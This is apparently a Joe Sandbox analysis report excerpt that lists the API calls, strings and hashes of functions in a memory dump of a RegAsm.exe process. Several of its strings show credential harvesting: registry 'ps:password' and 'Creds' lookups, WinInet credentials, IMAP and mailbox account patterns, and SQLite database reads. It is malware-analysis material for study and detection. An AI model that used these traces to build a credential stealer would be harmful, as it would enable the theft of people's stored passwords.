                                                                                                                                                                                                • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • wcsstr.MSVCRT ref: 0040426A
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                                                                                                                                • strchr.MSVCRT ref: 004042F6
                                                                                                                                                                                                • strlen.MSVCRT ref: 0040430A
                                                                                                                                                                                                • sprintf.MSVCRT ref: 0040432B
                                                                                                                                                                                                • strchr.MSVCRT ref: 0040433C
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                                                                                                                • String ID: %s@gmail.com$www.google.com
                                                                                                                                                                                                • API String ID: 3866421160-4070641962
                                                                                                                                                                                                • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                                                                                                                                • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                                                                                                                                • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _mbscpy.MSVCRT(0045A448,?), ref: 00409749
                                                                                                                                                                                                • _mbscpy.MSVCRT(0045A550,general,0045A448,?), ref: 00409759
                                                                                                                                                                                                  • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                                                                                                                                  • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                                                                                                                                  • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                                                                                                                                • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                                                                                                                                                                                                • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                                                                                                                                                                                                • _mbscpy.MSVCRT(0045A550,strings), ref: 004097A1
                                                                                                                                                                                                • memset.MSVCRT ref: 004097BD
                                                                                                                                                                                                • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                                                                                                                                                                                                  • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                                                                                                • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                                                                                                                • API String ID: 1035899707-3647959541
                                                                                                                                                                                                • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                                                                                                                                • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                                                                                                                                                                • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                                                                                                                                • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,Common Programs,00410E5B,?,?,?,?,?,00000104), ref: 00410DB0
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _mbscpy
                                                                                                                                                                                                • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                                • API String ID: 714388716-318151290
                                                                                                                                                                                                • Opcode ID: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                                                                                                                                                                • Instruction ID: efcd42a8463342e3d8d24718a8e89ec7c05b938a093e831c325fe23e20e40f83
                                                                                                                                                                                                • Opcode Fuzzy Hash: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3FF0D0B1EA8B15E434FC01E8BE06BF220109481B457BC42E7B08AE16DDC8CDF8C2601F
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                                                                                                                                                                                • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 0040CACC
                                                                                                                                                                                                • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                                                                                                                                                                                • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                                                                                                                                                                                  • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                                                                                                                                                                                  • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                                                                                                                                                                                  • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                                                                                                                                                                                • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 0040CB35
                                                                                                                                                                                                • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                                                                                                                                                                                • SetFocus.USER32(?), ref: 0040CB92
                                                                                                                                                                                                • SetFocus.USER32(?), ref: 0040CC0B
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1416211542-0
                                                                                                                                                                                                • Opcode ID: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                                                                                                                                • Instruction ID: a165bd417b068057189d88e4de4b8a05c76419b6bed384540fbaf8c3ec59208f
                                                                                                                                                                                                • Opcode Fuzzy Hash: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                                                                                                                                • Instruction Fuzzy Hash: BE51D371504604EFCB119FB5DCCAAAA77B5FB09301F040636FA06A72A1DB38AD41DB6D
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                                                                                                                • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                                                                • API String ID: 2360744853-2229823034
                                                                                                                                                                                                • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                                                                                                                                • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                                                                                                                                • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                                                                                                                                • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • strchr.MSVCRT ref: 004100E4
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                                                                  • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                                                                  • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                                                                                                  • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                                                                                                                • _mbscat.MSVCRT ref: 0041014D
                                                                                                                                                                                                • memset.MSVCRT ref: 00410129
                                                                                                                                                                                                  • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                                                                                                                  • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                                                                                                                • memset.MSVCRT ref: 00410171
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                                                                                                                • _mbscat.MSVCRT ref: 00410197
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                                                                                                • String ID: \systemroot
                                                                                                                                                                                                • API String ID: 912701516-1821301763
                                                                                                                                                                                                • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                                                                                                                                • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                                                                                                                                • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 0040F84A
                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040F937
                                                                                                                                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Close$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                                                                                                                • String ID: Creds$ps:password
                                                                                                                                                                                                • API String ID: 313032062-1872227768
                                                                                                                                                                                                • Opcode ID: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                                                                                                                                                • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                                                                                                                                                                                • Opcode Fuzzy Hash: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                                                                                                                                                • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
                                                                                                                                                                                                • String ID: 0$6
                                                                                                                                                                                                • API String ID: 3540791495-3849865405
                                                                                                                                                                                                • Opcode ID: 746a6444b456afcb3e36d1fa8bdf2724fef8bbe8bc7db3e616028793154f0cb8
                                                                                                                                                                                                • Instruction ID: 99806e288156f34ba132e8f36af0febe6860c11fee4b77973fd999a480d51a7c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 746a6444b456afcb3e36d1fa8bdf2724fef8bbe8bc7db3e616028793154f0cb8
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7631B172408385AFD720DF51D841A9BBBE9FB84314F04483FF69492292D779D944CF5A
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                                                                                • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                                                                                                                                                                • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00410970
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                                                                                                                                                                • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                                                                                                                                • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                                                                                                                                • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                                                • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                                                                                                                • API String ID: 1640410171-2022683286
                                                                                                                                                                                                • Opcode ID: a6622c3935392687b7cdf7bff07cfba8d523efe949d3c24d6b26d746122f1250
                                                                                                                                                                                                • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                                                                                                                                                                                • Opcode Fuzzy Hash: a6622c3935392687b7cdf7bff07cfba8d523efe949d3c24d6b26d746122f1250
                                                                                                                                                                                                • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                                                                                                                                                • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                                                                                                                                                • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpy$strlen
                                                                                                                                                                                                • String ID: -journal$-wal$immutable$nolock
                                                                                                                                                                                                • API String ID: 2619041689-3408036318
                                                                                                                                                                                                • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                                                                                • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$strlen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 667451143-3916222277
                                                                                                                                                                                                • Opcode ID: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                                                                                                                                                                                • Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
                                                                                                                                                                                                • wcslen.MSVCRT ref: 0040874A
                                                                                                                                                                                                • wcsncmp.MSVCRT ref: 00408794
                                                                                                                                                                                                • memset.MSVCRT ref: 0040882A
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                                                                                                                                • wcschr.MSVCRT ref: 0040889F
                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                                                • String ID: J$Microsoft_WinInet
                                                                                                                                                                                                • API String ID: 893589435-260894208
                                                                                                                                                                                                • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                                                                                                                                • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 00406CA1
                                                                                                                                                                                                • FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00406CBF
                                                                                                                                                                                                • strlen.MSVCRT ref: 00406CCC
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,00000400,?,00000000,00000000), ref: 00406CDC
                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00406CE6
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,Unknown Error,?,00000400,?,00000000,00000000), ref: 00406CF6
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                                                                                                                                • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                                • API String ID: 2881943006-572158859
                                                                                                                                                                                                • Opcode ID: 3ddff6ca73234fcaad2cc89b351310259c35e619cc53eac77f1216a830b0495f
                                                                                                                                                                                                • Instruction ID: bcf62a4d61e6eba693f00c41f459c7331aa1a44f371262b110411e5fdf5e0d86
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ddff6ca73234fcaad2cc89b351310259c35e619cc53eac77f1216a830b0495f
                                                                                                                                                                                                • Instruction Fuzzy Hash: B201DF31609114BBF7051B61EE46F9FBA6CEF49790F20002AF607B1191DA78AE10969C
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • LoadLibraryA.KERNEL32(psapi.dll), ref: 00410047
                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Library$FreeLoad
                                                                                                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                                                                                                • API String ID: 534179979-232097475
                                                                                                                                                                                                • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                                                                                                • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                                                                                                                                • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                                                                                                • _mbscpy.MSVCRT(0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409686
                                                                                                                                                                                                • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409696
                                                                                                                                                                                                • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                                                                                                                  • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                                                                                                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                                • API String ID: 888011440-2039793938
                                                                                                                                                                                                • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                                                                                                                                • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                                                                                                                                • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • unable to open database: %s, xrefs: 0042EBD6
                                                                                                                                                                                                • database %s is already in use, xrefs: 0042E9CE
                                                                                                                                                                                                • out of memory, xrefs: 0042EBEF
                                                                                                                                                                                                • too many attached databases - max %d, xrefs: 0042E951
                                                                                                                                                                                                • cannot ATTACH database within transaction, xrefs: 0042E966
                                                                                                                                                                                                • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                                                                                                                                                                • database is already attached, xrefs: 0042EA97
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                                                                • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                                • API String ID: 1297977491-2001300268
                                                                                                                                                                                                • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                                                                                                                • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                                                                                                                                                                                • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                                                                                                                • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00409C53
